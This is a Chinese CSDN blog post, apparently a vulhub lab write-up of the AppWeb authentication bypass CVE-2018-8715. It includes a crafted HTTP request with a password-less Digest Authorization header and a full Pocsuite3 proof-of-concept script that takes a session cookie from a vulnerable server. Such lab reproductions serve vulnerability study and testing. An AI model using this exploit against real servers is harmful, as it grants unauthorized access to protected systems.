vulhub-AppWeb(CVE-2018-8715)

最新推荐文章于 2024-05-01 00:03:56 发布
最新推荐文章于 2024-05-01 00:03:56 发布
阅读量270 收藏 1
点赞数
分类专栏: vulhub
原文链接:https://blog.csdn.net/lingluofengzang/article/details/96275522
版权
本文详细介绍了AppWeb Web服务器的认证绕过漏洞(CVE-2018-8715),该漏洞允许攻击者通过构造特定的Authorization头,不提供密码即可通过digest和form认证。漏洞影响7.0.3之前的版本。文中提供了漏洞环境搭建、复现步骤以及Pocsuite3的PoC代码,展示了如何利用此漏洞获取session并访问受限页面。
摘要由CSDN通过智能技术生成

AppWeb认证绕过漏洞(CVE-2018-8715)

AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。

AppWeb可以进行认证配置,其认证方式包括以下三种:

  • basic 传统HTTP基础认证
  • digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
  • form 表单认证

其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。

参考链接:

  • https://ssd-disclosure.com/index.php/archives/3676

漏洞环境

执行如下命令启动一个带有digest认证的Appweb 7.0.1服务器:

docker-compose up -d

访问http://your-ip:8080,可见需要输入账号密码。

漏洞复现

利用该漏洞需要知道一个已存在的用户名,当前环境下用户名为admin

构造头Authorization: Digest username=admin,并发送如下数据包:

GET / HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin

可见,因为我们没有传入密码字段,所以服务端出现错误,直接返回了200,且包含一个session:

在这里插入图片描述

设置这个session到浏览器,即可正常访问需要认证的页面:

在这里插入图片描述
editthiscookie没有成功,后面是直接在浏览器里面编辑的:
在这里插入图片描述

脚本

"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""

from collections import OrderedDict
import requests

from pocsuite3.api import Output, POCBase, OptString, register_poc, POC_CATEGORY, OptDict


class DemoPOC(POCBase):
	vulID = '97181'  # ssvid
	version = '1'
	author = ['sumo']
	vulDate = '2018-03-14'
	createDate = '2018-03-15'
	updateDate = '2018-03-15'
	references = ['https://www.seebug.org/vuldb/ssvid-97181']
	name = 'AppWeb认证绕过漏洞(CVE-2018-8715)'
	appPowerLink = 'https://www.embedthis.com/'
	appName = 'AppWeb'
	appVersion = '< 7.0.3'
	vulType = 'Login Bypass'
	desc = '''
		其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null
		(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,
		并返回session。
	'''
	samples = ['http://10.10.100.92:8080/']
	install_requires = []
	category = POC_CATEGORY.EXPLOITS.WEBAPP
	protocol = POC_CATEGORY.PROTOCOL.HTTP


	def _options(self):
		o = OrderedDict()
		o["username"] = OptString('', description='这个poc需要用户输入登录账号', require=True)
		return o

	def _verify(self):
		result = {}
		playload = "Digest username=\"{0}\"".format(self.get_option("username"))
		get_headers = {
				'Proxy-Connection': 'keep-alive',
				'Upgrade-Insecure-Requests': '1',
				'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
				'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
				'Accept-Encoding': 'gzip, deflate',
				'Accept-Language': 'zh-CN,zh;q=0.9'
			}
		vul_url = self.url
		if vul_url.endswith('/'):
			vul_url = vul_url[:-1]
		if "http://" in vul_url:
			host = vul_url[7:]
		elif "https://" in vul_url:
			host = vul_url[8:]
		else:
			host = vul_url
		
		get_headers['Host'] = host
		get_headers['Authorization'] = playload
		r = requests.get(url=vul_url, headers=get_headers)
		if r.status_code == 200:
			result['VerifyInfo'] = {}
			result['VerifyInfo']['URL'] = vul_url
			result['VerifyInfo']['set-cookie'] = r.headers['set-cookie']
		else:
			result['VerifyInfo'] = {}
			result['VerifyInfo']['URL'] = vul_url
			result['VerifyInfo']['set-cookie'] = get_headers

		return self.parse_output(result)

	def _attack(self):
		return self._verify()

	def parse_output(self, result):
		output = Output(self)
		if result:
			output.success(result)
		else:
			output.fail('target is not vulnerable')
		return output

register_poc(DemoPOC)

演示效果如下:
在这里插入图片描述

执行成功:

在这里插入图片描述

参考文献

https://blog.csdn.net/lingluofengzang/article/details/96275522

ju1uk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-8715(AppWeb认证绕过漏洞)
weixin_51387754的博客
10-26 943
漏洞简介 漏洞编号:CVE-2018-8715 影响版本:7.0.3之前的版本 https://www.cvedetails.com/cve/CVE-2018-8715/ 漏洞产生原因: AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 form 表单认证 其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为nul
AppWeb认证绕过漏洞(CVE-2018-8715
苏莫
07-17 2078
AppWeb认证绕过漏洞(CVE-2018-8715) 原理 AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 form 表单认证 其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没...
some_pocsuite:用于漏洞排查的pocsuite3验证POC代码
05-23
some_pocsuite 用于企业内部进行漏洞排查与验证的的pocsuite3验证POC代码(pocsuite3是知道创宇安全团队的开源漏洞测试框架)。 由于原Pocsuite已停止更新,因此将原来的POC代码全部重新改写并迁移到pocsuite3,原POC备份在PocsuiteV2中。 插件代码编写 使用pocsuite3 漏洞测试框架,插件编写请参考 pocsuite3 项目插件编写要求。 序号 poc 说明 1 hikvision-2013-4976_web_login-bypass.py 海康威视cve-2013-4976匿名登录验证绕过 2 weblogic-vul-check_all_rce.py weblogic反序列化漏洞(CVE-2016-0638,CVE-2016-3510,CVE-2017-3248,CVE-2018-2628,CVE-2018-2893, CVE-
AppWeb 身份验证绕过漏洞 (CVE-2018-8715
chenming08的博客
04-28 1339
当前漏洞环境部署在vulhub,当前验证环境为vulhub靶场(所有实验均为虚拟环境)4、只保留用户名参数,发包(需取消用户名上的引号,不然发包之后无回显)2、访问AppWeb控制台:http://your-ip:8080。5、将session添加过来,继续发包。3、抓包,使用用户名、密码admin。实验环境:攻击机----kali。使用用户名、密码admin访问。1、进入靶场,启动环境。靶机:centos7。
vulhub-CVE-2021-41773
ce666666的博客
01-05 348
漏洞原理 Apache在2.4.49版本中,引入路径体验,该漏洞仅影响具有“要求全部拒绝”访问权限的 Apache HTTP Server 2.4.49 版控制配置禁用。 漏洞危害 可利用漏洞进行远程RCE,访问web服务器上文档根目录之外的任意文件。泄露CGI。 影响版本 Apache HTTPd 2.4.49/2.4.50版本 环境搭建和测试 切换到vulhub/httpd/CVE-2021-41773,启动环境 docker-compose up -d 浏览器访问ip:8080 使用curl发送p
利用Vulnhub复现漏洞 - AppWeb认证绕过漏洞(CVE-2018-8715
JiangBuLiu的博客
06-27 1056
AppWeb认证绕过漏洞(CVE-2018-8715Vulnhub官方复现教程漏洞原理漏洞环境启动环境浏览器BurpSuite漏洞复现【注意】Burp不知名原因,会消失最后一个字节利用session Vulnhub官方复现教程 https://vulhub.org/#/environments/appweb/CVE-2018-8715/ 漏洞原理 AppWeb是Embedthis Softwar...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-8120:CVE-2018-8120 Windows LPE攻击
05-16
CVE-2018-8120 CVE-2018-8120 Windows LPE攻击 同时支持x32和x64。 经过测试:Win7 x32,Win7 x64,Win2008 x32,Win2008 R2 x32,Win2008 R2 Datacenter x64,Win2008 Enterprise x64。 用法 CVE-2018-8120 ...
CVE-2018-18778.docx
07-23
首先,进入Vulhub的`mini_httpd/CVE-2018-18778`目录,然后运行`docker-compose up -d`命令启动mini_httpd 1.29的容器。成功启动后,服务器将在`http://192.168.50.93:8080`上提供服务。此时,可以通过访问这个地址...
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
AppWeb 身份验证绕过漏洞 (CVE-2018-8715)漏洞复现
weixin_56537388的博客
11-09 202
AppWeb 是一个嵌入式 Web 服务器,基于由 Embedthis Software LLC 开发和维护的开源 GPL 协议。在低于 7.0.3 的 Appweb 版本中,存在与 authCondition 函数相关的逻辑缺陷。使用伪造的 HTTP 请求,可以绕过 和 登录类型的身份验证,(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。利用获取到的 session,修改请求头为POST 添加 session 请求体。搭建docker环境。
04 - vulhub - AppWeb认证绕过漏洞(CVE-2018-8715
易编橙 · 终身成长社群,相遇已是上上签!
10-14 583
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。
AppWeb 身份验证绕过漏洞 (CVE-2018-8715)
m0_74402888的博客
05-01 392
在低于 7.0.3 的 Appweb 版本中,存在与 authCondition 函数相关的逻辑缺陷。使用伪造的 HTTP 请求,可以绕过 和 登录类型的身份验证,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。AppWeb 是一个嵌入式 Web 服务器,基于由 Embedthis Software LLC 开发和维护的开源 GPL 协议。digest,改进了 HTTP 基本身份验证。
[vulhub]appweb认证绕过漏洞--CVE-2018-8715
haoaaao的博客
04-28 374
0x00 前置 AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。 AppWeb可以进行认证配置,其认证方式包括以下三种: 1、basic 传统HTTP基础认证 2、digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
AppWeb认证绕过漏洞复现(CVE-2018-8715
qq_45785324的博客
01-31 412
CVE-2018-8715漏洞复现
AppWeb空密码认证绕过漏洞(CVE-2018-8715
weixin_43455294的博客
08-14 1400
容器简介:Appweb是一款超快速且紧凑的嵌入式Web服务器,可高效,安全地托管嵌入式Web应用程序。Appweb通过包含ESP Web框架和一系列广泛的功能,大大减少了开发Web应用程序的时间和成本。 影响版本:Appweb版本4.0到7.0.2 漏洞概述: 这里涉及到appweb的三种身份验证方式: basic 传统HTTP基础认证 digest 改进版HTTP基础认证,认证成...
编程爱好者博客地带.zip
最新发布
08-23
该毕业设计将深入探讨如何通过Java语言构建一个完整且高效的《编程爱好者博客地带》。毕业设计的架构涵盖了从基础框架搭建到关键功能实现的每一个环节,并采用了模块化设计,使整个系统易于理解、扩展和维护。 无论是数据处理、用户交互还是后台管理,我们都为您提供了详细的代码示例和设计文档。 这个毕业设计的独特之处在于其高度的实用性和灵活性。 我们提供了全面的资源包,帮助您快速入门,并支持您在此基础上进行个性化的功能扩展。 无论您是正在寻找灵感的学生,还是需要现成解决方案的开发者,下载该资源将助您事半功倍。
以下Weblogic漏洞为反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
以下Weblogic漏洞为反序列化的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的反序列化漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意序列化数据,从而实现远程代码执行、绕过身份验证等攻击。 以下是反序列化漏洞的相关信息: A. CVE-2017-10271:WebLogic Server WLS-WSAT组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现远程代码执行。 B. CVE-2018-2628:WebLogic Server T3协议反序列化漏洞,攻击者可以通过构造特定的T3协议请求,实现远程代码执行。 C. CVE-2014-4210:WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506:WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份验证。 因此,选项A、B和D是反序列化漏洞。 答案:A、B、D。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值